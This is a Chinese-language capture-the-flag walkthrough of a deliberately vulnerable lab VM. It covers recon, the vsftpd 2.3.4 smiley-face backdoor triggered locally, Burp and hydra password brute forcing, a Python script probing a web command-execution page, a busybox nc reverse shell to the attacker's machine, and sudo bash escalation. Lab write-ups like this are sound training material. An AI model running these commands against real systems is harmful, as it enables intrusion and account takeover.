1. 基本信息
靶机链接:
https://maze-sec.com/library
https://hackmyvm.eu/machines/machine.php?vm=
难度:⭐️⭐️
知识点:信息收集,`VSFTPD 2.3.4`,`Ftp笑脸漏洞`,`burp`爆破,弱密码生成,`hydra`爆破,`bash`提权2. 信息收集
Nmap
└─# arp-scan -l | grep PCS
192.168.31.10 08:00:27:9f:f6:73 PCS Systemtechnik GmbH
└─# IP=192.168.31.10
└─# nmap -sV -sC -A $IP -Pn
└─# nmap -sV -sC -A $IP -P
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-21 08:03 CST
Nmap scan report for Yibasuo (192.168.31.10)
Host is up (0.0018s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.31.126
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 14 Jun 17 13:41 creds.txt
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Linux\xE9\x9D\xB6\xE6\x9C\xBA\xE5\x85\xA5\xE5\x8F\xA3
MAC Address: 08:00:27:9F:F6:73 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)开放了21、22、80端口,先看看21有啥东西
3.目录扫描
└─# dirsearch -u http://$IP -x 403 -e txt,php,html
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://$IP -x.txt,.php,.html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.10
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 278]
/.html (Status: 403) [Size: 278]
/index.php (Status: 200) [Size: 4087]
/info.php (Status: 200) [Size: 85750]
/secure (Status: 301) [Size: 315] [--> http://192.168.31.10/secure/]
/.php (Status: 403) [Size: 278]
/.html (Status: 403) [Size: 278]
/server-status (Status: 403) [Size: 278]
Progress: 882236 / 882240 (100.00%)习惯性扫目录没啥有用信息,访问主页是个登陆页面
4.ftp测试
有ftp anonymous@$IP登陆后,有个提示信息root:fakepass
└─# ftp anonymous@$IP
Connected to 192.168.31.10.
220 (vsFTPd 2.3.4)
331 Please specify the password.
Password:#直接回车
230 Login successful.
ftp> ls -artl
229 Entering Extended Passive Mode (|||7793|).
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 14 Jun 17 13:41 creds.txt
drwxr-xr-x 2 0 0 4096 Jun 17 13:41 .
drwxr-xr-x 2 0 0 4096 Jun 17 13:41 ..
226 Directory send OK.
ftp> get creds.txt
local: creds.txt remote: creds.txt
229 Entering Extended Passive Mode (|||17086|).
150 Opening BINARY mode data connection for creds.txt (14 bytes).
100% |***************************************************************************| 14 31.72 KiB/s 00:00 ETA
226 Transfer complete.
14 bytes received in 00:00 (6.00 KiB/s)
└─# cat creds.txt
root:fakepass直接拿给的账号密码root:fakepass去登陆网页、ftp、ssh登陆均失败,先hydra爆破一下弱密码
└─# hydra -l root -P /usr/share/wordlists/rockyou.txt ftp://$IP -V -I -u -f -e nsr测试一圈没得用,给出的提示信息是个烟雾弹
Ftp笑脸漏洞(VSFTPD 2.3.4)复现(后门漏洞)
注意到VSFTPD 2.3.4有个Ftp笑脸漏洞(VSFTPD 2.3.4),如果FTP认证时的用户名包含特殊字符“:)”,服务器会自动打开6200端口,并在该端口上提供一个root权限的shell。攻击者可以通过连接该端口,直接以root身份登录目标服务器.
利用netcat,连接靶机的21端口,输入user带有 :) ,pass随便输入
#直接测试会卡住没反应,提示超时
└─# ftp $IP
Connected to 192.168.31.10.
220 (vsFTPd 2.3.4)
Name (192.168.31.10:root): 123 :)
331 Please specify the password.
Password:
421 Service not available, remote server timed out. Connection closed.
ftp: Login failed
#
└─# nmap -sV -sC $IP -p 6200
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-22 07:53 CST
Nmap scan report for Yibasuo (192.168.31.10)
Host is up (0.0011s latency).
PORT STATE SERVICE VERSION
6200/tcp filtered lm-x
MAC Address: 08:00:27:9F:F6:73 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
输入user带有 :)测试后,再扫描6200端口显示filtered,说明漏洞已经被利用,但是6200端口防火墙等手段给禁用了,不能远程一把嗦
msf一把嗦
msf6 > search vsftpd 2.3.4
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.31.10
RHOSTS => 192.168.31.10
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 192.168.31.10:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.31.10:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >再用msf测试也不能一把嗦建立会话
5.获得www-data权限
Ftp笑脸漏洞(VSFTPD 2.3.4)不能一把嗦,只有老老实实去web爆破账户信息
burp抓包爆破
#burp抓包后去爆破admin的密码
POST / HTTP/1.1
Host: 192.168.31.10
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.31.10
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.31.10/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=r65m2emt9k6h6jh84ta0sito44
Connection: close
username=admin&password=§admin§
拿到web登陆后台账号admin/password123,登录后可以执行命令,但是只能执行一部分
先构造个命令字典cmd.txt,群主分享了简单方法直接去kali的/usr/bin目录取关键字
└─# ls /usr/bin | xargs -n1 > cmd.txt
└─# cp cmd.txt /mnt/c/Users/family/Desktop/
#burp爆破
POST /secure/ HTTP/1.1
Host: 192.168.31.10
Content-Length: 10
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.31.10
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.31.10/secure/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=r65m2emt9k6h6jh84ta0sito44
Connection: close
command=§id§
也可以让AI写一个``python`脚本
import requests
import sys
# 配置信息
url = "http://192.168.31.10/secure/"
dict_path = r"c:/Users/family/Desktop/cmd.txt"
success_results = []
# 从Burp抓包中提取的请求头
headers = {
"Host": "192.168.31.10",
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": "http://192.168.31.10",
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Referer": "http://192.168.31.10/secure/",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Cookie": "PHPSESSID=r65m2emt9k6h6jh84ta0sito44",
"Connection": "close"
}
try:
# 读取字典文件
with open(dict_path, 'r', encoding='utf-8') as f:
commands = [line.strip() for line in f.readlines() if line.strip()]
if not commands:
print("[!] 字典文件为空!")
sys.exit(1)
print(f"[*] 加载 {len(commands)} 条命令,开始爆破...")
# 遍历命令字典
for i, cmd in enumerate(commands, 1):
try:
data = {"command": cmd}
resp = requests.post(
url,
headers=headers,
data=data,
timeout=10
)
# 过滤包含"未授权的命令"的响应
if "未授权的命令" not in resp.text:
success_results.append((cmd, resp.text))
print(f"\n[+] 成功命令: {cmd}")
#print(f"[*] 响应内容:\n{resp.text[:500]}...") # 截取前500字符
else:
print(f"\r[-] 测试进度: {i}/{len(commands)} | 当前命令: {cmd.ljust(20)}", end='')
except Exception as e:
print(f"\n[!] 命令 '{cmd}' 请求失败: {str(e)}")
# 输出最终结果
print("\n\n爆破完成!结果汇总:")
if success_results:
print(f"\n{'=' * 50}\n成功命令: ")
for cmd, response in success_results:
#print(f"\n{'=' * 50}\n成功命令: {cmd}\n响应内容:\n{response[:1000]}{'...' if len(response) > 1000 else ''}")
print(f"{cmd}")
else:
print("[-] 未发现有效命令")
except FileNotFoundError:
print(f"[!] 字典文件不存在: {dict_path}")
except KeyboardInterrupt:
print("\n[!] 用户中断操作")运行结果
爆破完成!结果汇总:
busybox
date
df
free
netstat
uname
uptime
whoami
测试有busybox,直接去反弹个shell
#busybox nc 192.168.31.126 1234 -e /bin/bash
└─# nc -lvp 1234
listening on [any] 1234 ...
id
192.168.31.10: inverse host lookup failed: Host name lookup failure
connect to [192.168.31.126] from (UNKNOWN) [192.168.31.10] 41088
uid=33(www-data) gid=33(www-data) groups=33(www-data)拿到user.txt
www-data@Yibasuo:/var/www/html/secure$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Yibasuo:/var/www/html/secure$ cd /home/
www-data@Yibasuo:/home$ ls
ftp todd
www-data@Yibasuo:/home$ cd todd/
www-data@Yibasuo:/home/todd$ ls
user.txt
www-data@Yibasuo:/home/todd$ cat user.txt
flag{user-43109792-4b81-11f0-a435-9731ae49dbea}
果然做了限制6200端口访问防火墙
www-data@Yibasuo:/tmp$ ss -tnlup
Netid State Recv-Q Send-Q Local Address:Port
Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68
0.0.0.0:*
tcp LISTEN 0 32 0.0.0.0:21
0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22
0.0.0.0:*
tcp LISTEN 0 128 [::]:22
[::]:*
tcp LISTEN 0 128 *:80
*:*
www-data@Yibasuo:/tmp$
www-data@Yibasuo:/tmp$ cat /etc/iptables/rules.v4
# Generated by xtables-save v1.8.2 on Tue Jun 17 10:21:28 2025
*filter
:INPUT ACCEPT [85:8767]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [74:9890]
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 6200 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 6200 -j DROP
COMMIT
# Completed on Tue Jun 17 10:21:28 2025
www-data@Yibasuo:/tmp$拿到root.txt
Ftp笑脸漏洞(VSFTPD 2.3.4)利用
kali└─# ftp $IP
Connected to 192.168.31.10.
220 (vsFTPd 2.3.4)
Name (192.168.31.10:root): a:)
331 Please specify the password.
Password:
421 Service not available, remote server timed out. Connection closed.
ftp: Login failed靶机上直接访问本机127.0.0.1 的 6200 端口,就可以触发Ftp笑脸漏洞(VSFTPD 2.3.4)获取root权限了,{Ftp 笑脸漏洞, 用户名后门加 :) 然后随便输入密码 即可 开启 6200 后门}
www-data@Yibasuo:/tmp$ busybox nc 127.0.0.1 6200
nc: can't connect to remote host (127.0.0.1): Connection refused
www-data@Yibasuo:/tmp$
www-data@Yibasuo:/tmp$
www-data@Yibasuo:/tmp$ ss -tnlup
Netid State Recv-Q Send-Q Local Address:Port
Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68
0.0.0.0:*
tcp LISTEN 0 32 0.0.0.0:21
0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22
0.0.0.0:*
tcp LISTEN 0 100 0.0.0.0:6200
0.0.0.0:*
tcp LISTEN 0 128 [::]:22
[::]:*
tcp LISTEN 0 128 *:80
*:*
www-data@Yibasuo:/tmp$ busybox nc 127.0.0.1 6200
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
root.txt
cat root.txt
flag{root-15d4d3ec-4b81-11f0-9da9-b378f7bb3e40}注意:必须在kali上ftp登陆靶机期间,才能触发Ftp笑脸漏洞(输入密码等待期间靶机上6200端口才是开启状态),此时靶机访问6200端口即可获取root权限
6.解法2:获得todd权限
获取www-data权限后发现home目录下有账户todd,爆破密码,群主分享了针对特定账户的弱密码字典生成脚本generate_by_username.sh
弱密码字典
# cat generate_by_username.sh
#!/bin/bash
usage(){
echo "bash $(basename $0) <username>"
}
[ -z $1 ] && usage && exit 1
username=$1
muban="muban.key"
cat $muban|sed 's/%user%/'$username'/g'
└─# bash /CTF/generate_by_username.sh todd > todd.txt
└─# cat todd.txt
todd
todd123
todd1234
todd123456
todd12345
todd@123
......hydra爆破弱密码
└─# hydra -l todd -P todd.txt ssh://$IP -V -I -u -f -e nsr
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
......
[22][ssh] host: 192.168.31.10 login: todd password: todd123!@#
[STATUS] attack finished for 192.168.31.10 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-22 12:38:52拿到ssh的密码todd/todd123!@#
拿到user.txt
└─# ssh todd@$IP
todd@192.168.31.10's password:
Linux Yibasuo 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
todd@Yibasuo:~$ id
uid=1001(todd) gid=1001(todd) groups=1001(todd)
todd@Yibasuo:~$ cat /home/todd/user.txt
flag{user-43109792-4b81-11f0-a435-9731ae49dbea}7.获得root权限
sudo发现所有用户能够以 root 身份运行 /usr/bin/bash
todd@Yibasuo:~$ sudo -l
Matching Defaults entries for todd on Yibasuo:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User todd may run the following commands on Yibasuo:
(ALL) NOPASSWD: /usr/bin/bash
todd@Yibasuo:~$ sudo bash -p
root@Yibasuo:/home/todd# id
uid=0(root) gid=0(root) groups=0(root) 直接bash -p提权
拿到root.txt
root@Yibasuo:/home/todd# id
uid=0(root) gid=0(root) groups=0(root)
root@Yibasuo:/home/todd# cd
root@Yibasuo:~# ls
root.txt
root@Yibasuo:~# cat root.txt
flag{root-15d4d3ec-4b81-11f0-9da9-b378f7bb3e40}